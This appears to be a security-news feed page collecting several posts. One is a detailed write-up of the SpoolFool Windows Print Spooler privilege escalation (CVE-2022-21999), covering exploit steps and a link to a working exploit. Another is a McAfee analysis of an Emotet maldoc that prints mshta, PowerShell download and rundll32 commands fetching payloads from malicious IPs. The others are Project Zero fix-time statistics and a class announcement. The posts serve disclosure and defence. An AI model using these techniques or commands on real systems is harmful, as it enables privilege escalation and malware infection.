Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)

8 February 2022 at 20:21

UPDATE (Feb 9, 2022): Microsoft initially patched this vulnerability without giving me any information or acknowledgement, and as such, at the time of patch release, I thought that the vulnerability was identified as CVE-2022–22718, since it was the only Print Spooler vulnerability in the release without any acknowledgement. I contacted Microsoft for clarification, and the day after the patch release, Institut For Cyber Risk and I was acknowledged for CVE-2022–21999.

In this blog post, we’ll look at a Windows Print Spooler local privilege escalation vulnerability that I found and reported in November 2021. The vulnerability got patched as part of Microsoft’s Patch Tuesday in February 2022. We’ll take a quick tour of the components and inner workings of the Print Spooler, and then we’ll dive into the vulnerability with root cause, code snippets, images and much more. At the end of the blog post, you can also find a link to a functional exploit.

Background

Back in May 2020, Microsoft patched a Windows Print Spooler privilege escalation vulnerability. The vulnerability was assigned CVE-2020–1048, and Microsoft acknowledged Peleg Hadar and Tomer Bar of SafeBreach Labs for reporting the security issue. On the same day of the patch release, Yarden Shafir and Alex Ionescu published a technical write-up of the vulnerability. In essence, a user could write to an arbitrary file by creating a printer port that pointed to a file on disk. After the vulnerability (CVE-2020–1048) had been patched, the Print Spooler would now check if the user had permissions to create or write to the file before adding the port. A week after the release of the patch and blog post, Paolo Stagno (aka VoidSec) privately disclosed a bypass for CVE-2020–1048 to Microsoft. The bypass was patched three months later in August 2020, and Microsoft acknowledged eight independent entities for reporting the vulnerability, which was identified as CVE-2020–1337. The bypass for the vulnerability used a directory junction (symbolic link) to circumvent the security check. Suppose a user created the directory C:\MyFolder\ and configured a printer port to point to the file C:\MyFolder\Port. This operation would be granted, since the user is indeed allowed to create C:\MyFolder\Port. Now, what would happen if the user then turned C:\MyFolder\ into a directory junction that pointed to C:\Windows\System32\ after the port had been created? Well, the Spooler would simply write to the file C:\Windows\System32\Port.

These two vulnerabilities, CVE-2020–1048 and CVE-2020–1337, were patched in May and August 2020, respectively. In September 2020, Microsoft patched a different vulnerability in the Print Spooler. In short, this vulnerability allowed users to create arbitrary and writable directories by configuring the SpoolDirectory attribute on a printer. What was the patch? Almost the same story: After the patch, the Print Spooler would now check if the user had permissions to create the directory before setting the SpoolDirectory property on a printer. Perhaps you can already see where this post is going. Let’s start at the beginning.

Introduction to Spooler Components

The Windows Print Spooler is a built-in component on all Windows workstations and servers, and it is the primary component of the printing interface. The Print Spooler is an executable file that manages the printing process. Management of printing involves retrieving the location of the correct printer driver, loading that driver, spooling high-level function calls into a print job, scheduling the print job for printing, and so on. The Spooler is loaded at system startup and continues to run until the operating system is shut down. The primary components of the Print Spooler are illustrated in the following diagram.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-spooler-components

Application

The print application creates a print job by calling Graphics Device Interface (GDI) functions or directly into winspool.drv.

GDI

The Graphics Device Interface (GDI) includes both user-mode and kernel-mode components for graphics support.

winspool.drv

winspool.drv is the client interface into the Spooler. It exports the functions that make up the Spooler’s Win32 API, and provides RPC stubs for accessing the server.

spoolsv.exe

spoolsv.exe is the Spooler’s API server. It is implemented as a service that is started when the operating system is started. This module exports an RPC interface to the server side of the Spooler’s Win32 API. Clients of spoolsv.exe include winspool.drv (locally) and win32spl.dll (remotely). The module implements some API functions, but most function calls are passed to a print provider by means of the router (spoolss.dll).

Router

The router, spoolss.dll, determines which print provider to call, based on a printer name or handle supplied with each function call, and passes the function call to the correct provider.

Print Provider

The print provider that supports the specified print device.

Local Print Provider

The local print provider provides job control and printer management capabilities for all printers that are accessed through the local print provider’s port monitors.

The following diagram provides a view of control flow among the local printer provider’s components, when an application creates a print job.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-print-providers

While this control flow is rather large, we will mostly focus on the local print provider localspl.dll.

Vulnerability

The vulnerability consists of two bypasses for CVE-2020–1030. I highly recommend reading Victor Mata’s blog post on CVE-2020–1030, but I’ll try to cover the important parts as well.

When a user prints a document, a print job is spooled to a predefined location referred to as the “spool directory”. The spool directory is configurable on each printer and it must allow the FILE_ADD_FILE permission to all users.

Permissions of the default spool directory

Individual spool directories are supported by defining the SpoolDirectory value in a printer’s registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\<printer>.

The Print Spooler provides APIs for managing configuration data such as EnumPrinterData, GetPrinterData, SetPrinterData, and DeletePrinterData. Underneath, these functions perform registry operations relative to the printer’s key.

We can modify a printer’s configuration with SetPrinterDataEx. This function requires a printer to be opened with the PRINTER_ACCESS_ADMINISTER access right. If the current user doesn’t have permission to open an existing printer with the PRINTER_ACCESS_ADMINISTER access right, there are two options:

  • The user can create a new local printer
  • The user can add a remote printer

By default, users in the INTERACTIVE group have the “Manage Server” permission and can therefore create new local printers, as shown below.

Security of the local print server on Windows desktops

However, it seems that this permission is only granted on Windows desktops, such as Windows 10 and Windows 11. During my testing on Windows servers, this permission was not present. Nonetheless, it was still possible for users without the “Manage Server” permission to add remote printers.

If a user adds a remote printer, the printer will inherit the security properties of the shared printer from the printer server. As such, if the remote printer server allows Everyone to manage the printer, then it’s possible to obtain a handle to the printer with the PRINTER_ACCESS_ADMINISTER access right, and SetPrinterDataEx would update the local registry as usual. A user could therefore create a shared printer on a different server or workstation, and grant Everyone the right to manage the printer. On the victim server, the user could then add the remote printer, which would now be manageable by Everyone. While I haven’t fully tested how this vulnerability behaves on remote printers, it could be a viable option for situations, where the user cannot create or mange a local printer. But please note that while some operations are handled by the local print provider, others are handled by the remote print provider.

When we have opened or created a printer with the PRINTER_ACCESS_ADMINISTER access right, we can configure the SpoolDirectory on it.

When calling SetPrinterDataEx, an RPC request will be sent to the local Print Spooler spoolsv.exe, which will route the request to the local print provider’s implementation in localspl.dll!SplSetPrinterDataEx. The control flow consists of the following events:

  • 1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  • 2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue

In the case of setting the SpoolDirectory value, localspl.dll!SplSetPrinterDataEx will verify that the provided directory is valid before updating the registry key. This check was not present before CVE-2020–1030.

localspl.dll!SplSetPrinterDataEx

Given a path to a directory, localspl.dll!IsValidSpoolDirectory will call localspl.dll!AdjustFileName to convert the path into a canonical path. For instance, the canonical path for C:\spooldir\ would be \\?\C:\spooldir\, and if C:\spooldir\ is a symbolic link to C:\Windows\System32\, the canonical path would be \\?\C:\Windows\System32\. Then, localspl.dll!IsValidSpoolDirectory will check if the current user is allowed to open or create the directory with GENERIC_WRITE access right. If the directory was successfully created or opened, the function will make a final check that the number of links to the directory is not greater than 1, as returned by GetFileInformationByHandle.

localspl.dll!IsValidSpoolDirectory

So in order to set the SpoolDirectory, the user must be able to create or open the directory with writable permissions. If the validation succeeds, the print provider will update the printer’s SpoolDirectory registry key. However, the spool directory will not be created by the Print Spooler until it has been reinitialized. This means that we will need to figure out how to restart the Spooler service (we will come back to this part), but it also means that the user only needs to be able to create the directory during the validation when setting the SpoolDirectory registry key — and not when the directory is actually created.

In order to bypass the validation, we can use reparse points (directory junctions in this case). Suppose we create a directory named C:\spooldir\, and we set the SpoolDirectory to C:\spooldir\printers\. The Spooler will check that the user can create the directory printers inside of C:\spooldir\. The validation passes, and the SpoolDirectory gets set to C:\spooldir\printers\. After we have configured the SpoolDirectory, we can convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\. When the Spooler initializes, the directory C:\Windows\System32\printers\ will be created with writable permissions for everyone. If the directory already exists, the Spooler will not set writable permissions on the folder.

As such, we need to find an interesting place to create a directory. One such place is C:\Windows\System32\spool\drivers\x64\, also known as the printer driver directory (on other architectures, it’s not x64). The printer driver directory is particularly interesting, because if we call SetPrinterDataEx with the CopyFiles registry key, the Spooler will automatically load the DLL assigned in the Module value — if the Module file path is allowed.

This event is triggered when pszKeyName begins with the CopyFiles\ string. It initiates a sequence of functions leading to LoadLibrary.

localspl.dll!SplSetPrinterDataEx

The control flow consists of the following events:

  • 1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  • 2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue
  • 3. localspl.dll!SplCopyFileEvent is called if pszKeyName argument begins with CopyFiles\ string
  • 4. localspl.dll!SplCopyFileEvent reads the Module value from printer’s CopyFiles registry key and passes the string to localspl.dll!SplLoadLibraryTheCopyFileModule
  • 5. localspl.dll!SplLoadLibraryTheCopyFileModule performs validation on the Module file path
  • 6. If validation passes, localspl.dll!SplLoadLibraryTheCopyFileModule attempts to load the module with LoadLibrary

The validation steps consist of localspl.dll!MakeCanonicalPath and localspl.dll!IsModuleFilePathAllowed. The function localspl.dll!MakeCanonicalPath will take a path and convert it into a canonical path, as described earlier.

localspl.dll!MakeCanonicalPath

localspl.dll!IsModuleFilePathAllowed will validate that the canonical path either resides directly inside of C:\Windows\System32\ or within the printer driver directory. For instance, C:\Windows\System32\payload.dll would be allowed, whereas C:\Windows\System32\Tasks\payload.dll would not. Any path inside of the printer driver directory is allowed, e.g. C:\Windows\System32\spool\drivers\x64\my\path\to\payload.dll is allowed. If we are able to create a DLL in C:\Windows\System32\ or anywhere in the printer driver directory, we can load the DLL into the Spooler service.

localspl.dll!SplLoadLibraryTheCopyFileModule

Now, we know that we can use the SpoolDirectory to create an arbitrary directory with writable permissions for all users, and that we can load any DLL into the Spooler service that resides in either C:\Windows\System32\ or the printer driver directory. There is only one issue though. As mentioned earlier, the spool directory is created during the Spooler initialization. The spool directory is created when localspl.dll!SplCreateSpooler calls localspl.dll!BuildPrinterInfo. Before localspl.dll!BuildPrinterInfo allows Everybody the FILE_ADD_FILE permission, a final check is made to make sure that the directory path does not reside within the printer driver directory.

localspl.dll!BuildPrinterInfo

This means that a security check during the Spooler initialization verifies that the SpoolDirectory value does not point inside of the printer driver directory. If it does, the Spooler will not create the spool directory and simply fallback to the default spool directory. This security check was also implemented in the patch for CVE-2020-1030.

To summarize, in order to load the DLL with localspl.dll!SplLoadLibraryTheCopyFileModule, the DLL must reside inside of the printer driver directory or directly inside of C:\Windows\System32\. To create the writable directory during Spooler initialization, the directory must not reside inside of the printer driver directory. Both localspl.dll!SplLoadLibraryTheCopyFileModule and localspl.dll!BuildPrinterInfo check if the path points inside the printer driver directory. In the first case, we must make sure that the DLL path begins with C:\Windows\System32\spool\drivers\x64\, and in the second case, we must make sure that the directory path does not begin with C:\Windows\System32\spool\drivers\x64\.

During the both checks, the SpoolDirectory is converted to a canonical path, so even if we set the SpoolDirectory to C:\spooldir\printers\ and then convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\spool\drivers\x64\, the canonical path will still become \\?\C:\Windows\System32\spool\drivers\x64\printers\. The check is done by stripping of the first four bytes of the canonical path, i.e. \\?\C:\Windows\System32\spool\drivers\x64\ printers\ becomes C:\Windows\System32\spool\drivers\x64\ printers\, and then checking if the path begins with the printer driver directory C:\Windows\System32\spool\drivers\x64\. And so, here comes the second bug to pass both checks.

If we set the spooler directory to a UNC path, such as \\localhost\C$\spooldir\printers\ (and C:\spooldir\ is a reparse point to C:\Windows\System32\spool\drivers\x64\), the canonical path will become \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\, and during comparison, the first four bytes are stripped, so UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ is compared to C:\Windows\System32\spool\drivers\x64\ and will no longer match. When the Spooler initializes, the directory \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ will be created with writable permissions. We can now write our DLL into C:\Windows\System32\spool\drivers\x64\printers\payload.dll. We can then trigger the localspl.dll!SplLoadLibraryTheCopyFileModule, but this time, we can just specify the path normally as C:\Windows\System32\spool\drivers\x64\printers\payload.dll.

We now have the primitives to create a writable directory inside of the printer driver directory and to load a DLL within the driver directory into the Spooler service. The only thing left is to restart the Spooler service such that the directory will be created. We could wait for the server to be restarted, but there is a technique to terminate the service and rely on the recovery to restart it. By default, the Spooler service will restart on the first two “crashes”, but not on subsequent failures.

To terminate the service, we can use localspl.dll!SplLoadLibraryTheCopyFileModule to load C:\Windows\System32\AppVTerminator.dll. When loaded into Spooler, the library calls TerminateProcess which subsequently kills the spoolsv.exe process. This event triggers the recovery mechanism in the Service Control Manager which in turn starts a new Spooler process. This technique was explained for CVE-2020-1030 by Victor Mata from Accenture.

Here’s a full exploit in action. The DLL used in this example will create a new local administrator named “admin”. The DLL can also be found in the exploit repository.

SpoolFool in action

The steps for the exploit are the following:

  • Create a temporary base directory that will be used for our spool directory, which we’ll later turn into a reparse point
  • Create a new local printer named “Microsoft XPS Document Writer v4”
  • Set the spool directory of our new printer to be our temporary base directory
  • Create a reparse point on our temporary base directory to point to the printer driver directory
  • Force the Spooler to restart to create the directory by loading AppVTerminator.dll into the Spooler
  • Write DLL into the new directory inside of the printer driver directory
  • Load the DLL into the Spooler

Remember that it is sufficient to create the driver directory only once in order to load as many DLLs as desired. There’s no need to trigger the exploit multiple times, doing so will most likely end up killing the Spooler service indefinitely until a reboot brings it back up. When the driver directory has been created, it is possible to keep writing and loading DLLs from the directory without restarting the Spooler service. The exploit that can be found at the end of this post will check if the driver directory already exists, and if so, the exploit will skip the creation of the directory and jump straight to writing and loading the DLL. The second run of the exploit can be seen below.

Second run of SpoolFool

The functional exploit and DLL can be found here: https://github.com/ly4k/SpoolFool.

Conclusion

That’s it. Microsoft has officially released a patch. When I initially found out that there was a check during the actual creation of the directory as well, I started looking into other interesting places to create a directory. I found this post by Jonas L from Secret Club, where the Windows Error Reporting Service (WER) is abused to exploit an arbitrary directory creation primitive. However, the technique didn’t seem to work reliably on my Windows 10 machine. The SplLoadLibraryTheCopyFileModule is very reliable however, but assumes that the user can manage a printer, which is already the case for this vulnerability.

Patch Analysis

[Feb 08, 2022]

A quick check with Process Monitor reveals that the SpoolDirectory is no longer created when the Spooler initializes. If the directory does not exist, the Print Spooler falls back to the default spool directory.

To be continued…

Disclosure Timeline

  • Nov 12, 2021: Reported to Microsoft Security Response Center (MSRC)
  • Nov 15, 2021: Case opened and assigned
  • Nov 19, 2021: Review and reproduction
  • Nov 22, 2021: Microsoft starts developing a patch for the vulnerability
  • Jan 21, 2022: The patch is ready for release
  • Feb 08, 2022: Patch is silently released. No acknowledgement or information received from Microsoft
  • Feb 09, 2022: Microsoft gives acknowledgement to me and Institut For Cyber Risk for CVE-2022-21999

SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999) was originally published in IFCR on Medium, where people are continuing the conversation by highlighting and responding to this story.

First!

8 February 2022 at 17:38

Today we are launching the IFCR research blog. The ambition is to provide original research and new technical ideas and approaches to the offensive security community.

New material will be added occasionally and not by a defined schedule. That being said, we’ve already got quite a few interesting posts lined-up.

Stay tuned for more…!

The IFCR Offensive Ops Team


First! was originally published in IFCR on Medium, where people are continuing the conversation by highlighting and responding to this story.

A walk through Project Zero metrics

By: Ryan
10 February 2022 at 16:58

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor

Total bugs

Fixed by day 90

Fixed during
grace period

Exceeded deadline

& grace period

Avg days to fix

Apple

84

73 (87%)

7 (8%)

4 (5%)

69

Microsoft

80

61 (76%)

15 (19%)

4 (5%)

83

Google

56

53 (95%)

2 (4%)

1 (2%)

44

Linux

25

24 (96%)

0 (0%)

1 (4%)

25

Adobe

19

15 (79%)

4 (21%)

0 (0%)

65

Mozilla

10

9 (90%)

1 (10%)

0 (0%)

46

Samsung

10

8 (80%)

2 (20%)

0 (0%)

72

Oracle

7

3 (43%)

0 (0%)

4 (57%)

109

Others*

55

48 (87%)

3 (5%)

4 (7%)

44

TOTAL

346

294 (84%)

34 (10%)

18 (5%)

61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only about 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

Average number of days to fix bugs across all vendors is 61 days. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor

Bugs in 2019

(avg days to fix)

Bugs in 2020

(avg days to fix)

Bugs in 2021

(avg days to fix)

Apple

61 (71)

13 (63)

11 (64)

Microsoft

46 (85)

18 (87)

16 (76)

Google

26 (49)

13 (22)

17 (53)

Linux

12 (32)

8 (22)

5 (15)

Others*

54 (63)

35 (54)

14 (29)

TOTAL

199 (67)

87 (54)

63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the others not represented on the chart have collectively cut their time to fix in more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period used 9 times (notably with half being by Microsoft), versus the slightly lower average of 12.5 in the other years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor

Total bugs

Avg fix time

iOS

76

70

Android (Samsung)

10

72

Android (Pixel)

6

72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser

Bugs

Avg days from bug report to public patch

Avg days from public patch to release

Avg days from bug report to release

Chrome

40

5.3

24.6

29.9

WebKit

27

11.6

61.1

72.7

Firefox

8

16.6

21.1

37.8

Total

75

8.8

37.3

46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to "Avg days from public patch to release" column:

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, with time from bug report to releasing a fix in the stable channel in 30 days. The time to patch is very fast here, with just an average of 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public is the bulk of the overall time window, though overall we still see the Chrome (blue) bars of the histogram toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest number of days to release a patch at 73 days. Their time to land the fix publicly is in the middle between Chrome and Firefox, but unfortunately this leaves a very long amount of time for opportunistic attackers to find the patch and exploit it prior to the fix being made available to users. This can be seen by the Apple (red) bars of the second histogram mostly being on the right side of the graph, and every one of them except one being past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de-facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

Next COM Programming Class

5 February 2022 at 10:42

Update: the class is cancelled. I guess there weren’t that many people interested in COM this time around.

Today I’m opening registration for the COM Programming class to be held in April. The syllabus for the 3 day class can be found here. The course will be delivered in 6 half-days (4 hours each).

Dates: April (25, 26, 27, 28), May (2, 3).
Times: 2pm to 6pm, London time
Cost: 700 USD (if paid by an individual), 1300 USD (if paid by a company).

The class will be conducted remotely using Microsoft Teams or a similar platform.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of this class. In case you have doubts, talk to me.

Participants in my Windows Internals and Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Previous students in my classes get 10% off. Multiple participants from the same company get a discount (email me for the details).

To register, send an email to [email protected] with the title “COM Training”, and write the name(s), email(s) and time zone(s) of the participants.

COMReuse

zodiacon

Emotet’s Uncommon Approach of Masking IP Addresses

4 February 2022 at 23:00

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format: 185.7.214.7

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.

Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee
Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee

Threat Summary

  1. The initial attack vector is a phishing email with a Microsoft Excel attachment. 
  2. Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
  3. The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
  4. The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.

Figure 3- Named Manager and Auto_Open triggers
Figure 3- Named Manager and Auto_Open triggers

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

FORMAT OBFUSCATED CMD DEOBFUSCATED CMD
Hexadecimal cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html http://185[.]7[.]214[.]7/fer/fer.html
Octal cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.

Figure 4: Process tree of excel execution
Figure 4: Process tree of excel execution

The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code

Figure 5- Image of HTML page viewed on browser
Figure 5- Image of HTML page viewed on a browser

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:\Users\Public\Documents\ssd.dll”.

cmd line (New-Object Net.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

cmd line cmd  /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString

IOC

TYPE VALUE SCANNER DETECTION NAME
XLS 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c McAfee LiveSafe and Total Protection X97M/Downloader.nn
DLL a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3 McAfee LiveSafe and Total Protection

 

Emotet-FSY
HTML URL http://185[.]7[.]214[.]7/fer/fer.html

http://46[.]105[.]81[.]76/c.html

WebAdvisor Blocked
DLL URL http://185[.]7[.]214[.]7/fer/fer.png

http://46[.]105[.]81[.]76/cc.png

WebAdvisor Blocked

MITRE ATT&CK

TECHNIQUE ID TACTIC TECHNIQUE DETAILS DESCRIPTION
T1566 Initial access Phishing attachment Initial maldoc uses phishing strings to convince users to open the maldoc
T1204 Execution User Execution Manual execution by user
